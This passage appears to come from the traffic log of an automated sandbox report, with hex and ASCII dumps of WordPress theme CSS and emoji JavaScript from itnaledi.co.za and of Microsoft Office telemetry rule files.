                                                                                                                      2024-12-03 07:55:14 UTC7907INData Raw: 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 61 70 70 6c 65 74 2c 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 61 75 64 69 6f 2c 62 2c 62 69 67 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6f 64 79 2c 63 61 6e 76 61 73 2c 63 61 70 74 69 6f 6e 2c 63 65 6e 74 65 72 2c 63 69 74 65 2c 63 6f 64 65 2c 64 64 2c 64 65 6c 2c 64 65 74 61 69 6c 73 2c 64 66 6e 2c 64 69 76 2c 64 6c 2c 64 74 2c 65 6d 2c 65 6d 62 65 64 2c 66 69 65 6c 64 73 65 74 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 66 6f 72 6d 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 68 74 6d 6c 2c 69 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6c 69 2c
                                                                                                                      Data Ascii: a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 6e 6f 2d 6f 76 65 72 66 6c 6f 77 2d 79 20 62 6f 64 79 7b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 7d 2e 6c 69 67 68 74 20 68 31 2c 2e 6c 69 67 68 74 20 68 32 2c 2e 6c 69 67 68 74 20 68 33 2c 2e 6c 69 67 68 74 20 68 34 2c 2e 6c 69 67 68 74 20 68 35 2c 2e 6c 69 67 68 74 20 68 36 2c 2e 6c 69 67 68 74 20 70 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 63 6f 64 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 31 2e 36 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 65 6d 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 30 66
                                                                                                                      Data Ascii: :hidden!important}html.no-overflow-y body{overflow-y:hidden}.light h1,.light h2,.light h3,.light h4,.light h5,.light h6,.light p{color:#fff}code{display:block;clear:both;overflow:auto;padding:1.6em;margin-bottom:1.6em;white-space:pre;background-color:#f0f
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 74 74 6f 6e 5f 62 6f 72 64 65 72 65 64 5d 3e 61 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 29 7d 2e 6c 69 67 68 74 2d 74 65 78 74 20 23 74 6f 70 20 6e 61 76 3e 75 6c 3e 6c 69 5b 63 6c 61 73 73 2a 3d 62 75 74 74 6f 6e 5f 62 6f 72 64 65 72 65 64 5d 3e 61 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 23 74 6f 70 20 6e 61 76 3e 75 6c 3e 6c 69 5b 63 6c 61 73 73 2a 3d 62 75 74 74 6f 6e 5f 73 6f 6c 69 64 5f 63 6f 6c 6f 72 5d 3e 61 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 23 74 6f 70 20 6e 61 76 3e 75 6c 3e 6c 69 5b 63 6c 61 73 73 2a 3d 62 75 74 74 6f 6e 5f 73 6f 6c 69 64 5f 63 6f 6c 6f 72 5d 3e 61 20 2e 73 66 2d 73 75 62 2d 69
                                                                                                                      Data Ascii: tton_bordered]>a:before{border-color:rgba(0,0,0,.4)}.light-text #top nav>ul>li[class*=button_bordered]>a:before{border-color:#fff}#header-outer #top nav>ul>li[class*=button_solid_color]>a,#header-outer #top nav>ul>li[class*=button_solid_color]>a .sf-sub-i
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 36 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 2c 2e 38 2c 2e 32 35 2c 31 29 2c 6f 70 61 63 69 74 79 20 2e 36 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 2c 2e 38 2c 2e 32 35 2c 31 29 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 20 2e 63 61 72 74 5f 6c 69 73 74 2c 2e 6e 65 63 74 61 72 2d 73 6f 63 69 61 6c 2e 66 75 6c 6c 2d 77 69 64 74 68 3e 2a 2c 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 23 68
                                                                                                                      Data Ascii: t-transition:transform .65s cubic-bezier(.2,.8,.25,1),opacity .65s cubic-bezier(.2,.8,.25,1)}#header-outer .widget_shopping_cart,#header-outer .widget_shopping_cart .cart_list,.nectar-social.full-width>*,.wpcf7-form-control-wrap{display:block!important}#h
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 63 6c 6f 73 65 3a 62 65 66 6f 72 65 2c 62 6f 64 79 5b 64 61 74 61 2d 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2d 73 74 79 6c 65 3d 73 6c 69 64 65 2d 6f 75 74 2d 66 72 6f 6d 2d 72 69 67 68 74 5d 2e 6d 61 74 65 72 69 61 6c 20 61 2e 73 6c 69 64 65 5f 6f 75 74 5f 61 72 65 61 5f 63 6c 6f 73 65 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 36 29 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 63 61 72 74 3d 74 72 75 65 5d 20 23 74 6f 70 20 23 6d 6f 62 69 6c 65 2d 63 61 72 74 2d 6c 69 6e 6b 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 63 61 72 74 3d 74 72 75 65 5d 20 23 74 6f 70 20 2e 73 70 61 6e 5f 39 3e 2e 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64
                                                                                                                      Data Ascii: close:before,body[data-slide-out-widget-area-style=slide-out-from-right].material a.slide_out_area_close:before{background-color:rgba(0,0,0,.06)}#header-outer[data-cart=true] #top #mobile-cart-link,#header-outer[data-cart=true] #top .span_9>.slide-out-wid
                                                                                                                      2024-12-03 07:55:15 UTC8000INData Raw: 29 7d 62 6f 64 79 5b 64 61 74 61 2d 68 68 75 6e 3d 22 31 22 5d 2e 6f 72 69 67 69 6e 61 6c 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 72 65 6d 6f 76 65 2d 62 6f 72 64 65 72 3d 74 72 75 65 5d 2e 64 65 74 61 63 68 65 64 3a 6e 6f 74 28 2e 73 69 64 65 2d 77 69 64 67 65 74 2d 6f 70 65 6e 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 7d 62 6f 64 79 5b 64 61 74 61 2d 68 68 75 6e 3d 22 31 22 5d 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 72 65 73 69 7a 65 3d 22 30 22 5d 3a 6e 6f 74 28 5b 64 61 74 61 2d 66 6f 72 6d 61 74 3d 6c 65 66 74 2d 68 65 61 64 65 72 5d 29 2e 69 6e 76 69 73 69 62 6c 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 62 6f 64 79 5b
                                                                                                                      Data Ascii: )}body[data-hhun="1"].original #header-outer[data-remove-border=true].detached:not(.side-widget-open){border-color:rgba(255,255,255,0)}body[data-hhun="1"] #header-outer[data-header-resize="0"]:not([data-format=left-header]).invisible{box-shadow:none}body[
                                                                                                                      2024-12-03 07:55:15 UTC8000INData Raw: 6e 74 65 6e 74 2d 77 72 61 70 20 2e 70 61 72 61 6c 6c 61 78 5f 73 65 63 74 69 6f 6e 2e 74 6f 70 2d 6c 65 76 65 6c 20 2e 72 6f 77 2d 62 67 3a 6e 6f 74 28 5b 64 61 74 61 2d 70 61 72 61 6c 6c 61 78 2d 73 70 65 65 64 3d 66 69 78 65 64 5d 29 2c 2e 67 6c 6f 62 61 6c 2d 73 65 63 74 69 6f 6e 2d 61 66 74 65 72 2d 68 65 61 64 65 72 2d 6e 61 76 2d 61 63 74 69 76 65 20 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 5b 64 61 74 61 2d 70 61 72 61 6c 6c 61 78 3d 22 31 22 5d 20 2e 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 2d 69 6d 61 67 65 2c 2e 67 6c 6f 62 61 6c 2d 73 65 63 74 69 6f 6e 2d 61 66 74 65 72 2d 68 65 61 64 65 72 2d 6e 61 76 2d 61 63 74 69 76 65 20 2e 74 6f 70 2d 6c 65 76 65 6c 20 2e 6e 65 63 74 61 72 2d 72 65 63 65 6e 74 2d 70 6f 73 74 73 2d 73 69 6e 67 6c 65
                                                                                                                      Data Ascii: ntent-wrap .parallax_section.top-level .row-bg:not([data-parallax-speed=fixed]),.global-section-after-header-nav-active #page-header-bg[data-parallax="1"] .page-header-bg-image,.global-section-after-header-nav-active .top-level .nectar-recent-posts-single
                                                                                                                      2024-12-03 07:55:15 UTC8000INData Raw: 5f 61 6e 69 6d 61 74 65 5f 77 68 65 6e 5f 61 6c 6d 6f 73 74 5f 76 69 73 69 62 6c 65 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 77 70 62 5f 73 74 61 72 74 5f 61 6e 69 6d 61 74 69 6f 6e 7b 6f 70 61 63 69 74 79 3a 31 7d 62 6f 64 79 20 2e 77 70 62 5f 74 65 78 74 5f 63 6f 6c 75 6d 6e 20 68 32 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f 64 79 20 2e 77 70 62 5f 74 65 78 74 5f 63 6f 6c 75 6d 6e 20 68 33 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 2e 74 68 65 69 61 53 74 69 63 6b 79 53 69 64 65 62 61 72 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 76 63 5f 72 6f 77 2d 6f 2d 65 71 75 61 6c 2d 68 65 69 67 68 74 2e 76 63 5f 72 6f 77 2e 76 63
                                                                                                                      Data Ascii: _animate_when_almost_visible{opacity:0}.wpb_start_animation{opacity:1}body .wpb_text_column h2:last-child,body .wpb_text_column h3:last-child{margin-bottom:10px}.theiaStickySidebar:after{content:"";display:table;clear:both}.vc_row-o-equal-height.vc_row.vc
                                                                                                                      2024-12-03 07:55:15 UTC8000INData Raw: 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 2e 38 37 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 30 70 78 29 7b 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 73 65 63 74 69 6f 6e 20 2e 6c 69 67 68 74 20 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 77 70 62 5f 61 6e 69 6d 61 74 65 5f 77 68 65 6e 5f 61 6c 6d 6f 73 74 5f 76 69 73 69 62 6c 65 3a 6e 6f 74 28 2e 73 65 65 2d 74 68 72 6f 75 67 68 29 3a 6e 6f 74 28 2e 73 65 65 2d 74 68 72 6f 75 67 68 2d 32 29 3a 6e 6f 74 28 2e 73 65 65 2d 74 68 72 6f 75 67 68 2d 33 29 3a 6e 6f 74 28 2e 61 6e 69 6d 61 74 65 64 29 2c 62 6f 64 79 20 2e 6e 65 63 74 61
                                                                                                                      Data Ascii: tton:hover,.nectar-button:hover{opacity:.87;color:#fff}@media only screen and (min-width:1000px){.full-width-section .light .nectar-button.wpb_animate_when_almost_visible:not(.see-through):not(.see-through-2):not(.see-through-3):not(.animated),body .necta
                                                                                                                      2024-12-03 07:55:15 UTC8000INData Raw: 31 70 78 3b 77 69 64 74 68 3a 32 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 27 27 3b 6c 65 66 74 3a 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 6f 70 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 63 61 6c 63 28 2d 35 30 25 20 2b 20 2e 35 70 78 29 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 7d 2e 6c 69 67 68 74 20 2e 6e 65 63 74 61 72 2d 63 74 61 5b 64 61 74 61 2d 73 74 79 6c 65 3d 61 72 72 6f 77 2d 61 6e 69 6d 61 74 69 6f 6e 5d 20 2e 6c 69 6e 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 6e 65 63 74 61 72 2d 63
                                                                                                                      Data Ascii: 1px;width:25px;position:absolute;content:'';left:0;display:block;top:50%;transform-origin:left;background-color:#000;transform:translateY(calc(-50% + .5px)) translateZ(0)}.light .nectar-cta[data-style=arrow-animation] .line{background-color:#fff}.nectar-c


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      73192.168.2.44983213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:14 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 491
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                      x-ms-request-id: 21da0aac-a01e-0021-7d18-43814c000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075513Z-174f784596886s2bhC1EWR743w00000015ng000000006qkm
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:14 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      74192.168.2.44983413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:14 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 479
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                      x-ms-request-id: 0fbdb1d5-101e-0079-0270-435913000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075513Z-174f7845968ljs8phC1EWRe6en00000015eg000000006qqr
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:14 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      75192.168.2.449837196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC613OUTGET /wp-content/themes/salient/css/build/header/header-secondary-nav.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:14 UTC282INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:14 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "26f1-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 9969
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:14 UTC7910INData Raw: 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 20 2e 73 66 2d 6d 65 6e 75 20 6c 69 20 6c 69 20 75 6c 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 30 70 78 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 20 2e 6e 65 63 74 61 72 2d 6d 65 6e 75 2d 69 63 6f 6e 2d 69 6d 67 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 36 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 20 2e 6e 65 63 74 61 72 2d 6d 65 6e 75 2d 69 63 6f 6e 2c 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61
                                                                                                                      Data Ascii: #header-secondary-outer .sf-menu li li ul{margin-left:-20px;margin-top:-20px}#header-outer #header-secondary-outer .nectar-menu-icon-img{margin-bottom:0;width:16px;height:auto;vertical-align:middle}#header-secondary-outer .nectar-menu-icon,#header-seconda
                                                                                                                      2024-12-03 07:55:14 UTC2059INData Raw: 65 63 74 61 72 2d 63 65 6e 74 65 72 2d 74 65 78 74 2c 62 6f 64 79 2e 6f 72 69 67 69 6e 61 6c 20 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 5b 64 61 74 61 2d 6d 6f 62 69 6c 65 3d 64 69 73 70 6c 61 79 5f 66 75 6c 6c 5d 20 2e 6e 65 63 74 61 72 2d 63 65 6e 74 65 72 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 62 6f 64 79 2e 6f 72 69 67 69 6e 61 6c 20 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 5b 64 61 74 61 2d 6d 6f 62 69 6c 65 3d 64 69 73 70 6c 61 79 5f 66 75 6c 6c 5d 20 23 73 6f 63 69 61 6c 3e 6c 69 3e 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 5b 64 61 74 61 2d 6d 6f 62 69 6c 65 3d 64 69 73 70
                                                                                                                      Data Ascii: ectar-center-text,body.original #header-secondary-outer[data-mobile=display_full] .nectar-center-text{display:block}body.original #header-secondary-outer[data-mobile=display_full] #social>li>a{border:none!important}#header-secondary-outer[data-mobile=disp


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      76192.168.2.449838196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:14 UTC390OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.1.7 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:15 UTC297INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:14 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:25:24 GMT
                                                                                                                      ETag: "48b9-5eed4ead72900"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 18617
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:15 UTC7895INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 74 77 65 6d 6f 6a 69 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 76 2f 31 34 2e 30 2e 32 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 64 29 7b 64 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70
                                                                                                                      Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/14.0.2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typ
                                                                                                                      2024-12-03 07:55:15 UTC8000INData Raw: 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30
